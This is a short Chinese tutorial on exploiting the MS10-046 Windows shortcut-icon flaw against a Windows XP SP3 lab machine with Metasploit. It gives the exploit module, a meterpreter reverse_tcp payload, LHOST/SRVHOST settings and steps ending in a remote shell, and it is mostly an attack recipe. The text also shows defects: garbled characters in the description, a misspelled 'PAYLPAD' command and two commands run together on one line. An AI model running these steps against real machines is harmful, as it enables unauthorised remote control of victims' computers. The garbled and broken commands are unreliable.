微软MS10-046漏洞报告

2025-04-18 11:01:13

如果被攻击者显示特指的快捷方式图标或者捂执涡扔使用特制的共享时，则该漏洞可能允许远程执行代码。成功利用漏洞的攻击者可以获得与本地用户相同的用户权限。

工具/原料

Metasploit

windows XP SP3

准备阶段

1、获取攻击方IP

2、获取入侵方IP

3、互相ping通

Metasploit使用

1、Metasploit打开

2、找到漏洞模块

3、use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

4、set PAYLPAD windows/meterpreter/reverse_tcp

5、set SRVHOST 192.168.88.227set LHOST 192.168.88.227

使用最后阶段

1、exploit

2、建立共享连接

3、回弹

4、查看连接

5、进入cmd

6、拿到shell

声明：本网站引用、摘录或转载内容仅供网站访问者交流或参考，不代表本站立场，如存在版权或非法内容，请联系站长删除，联系邮箱：site.kefu@qq.com。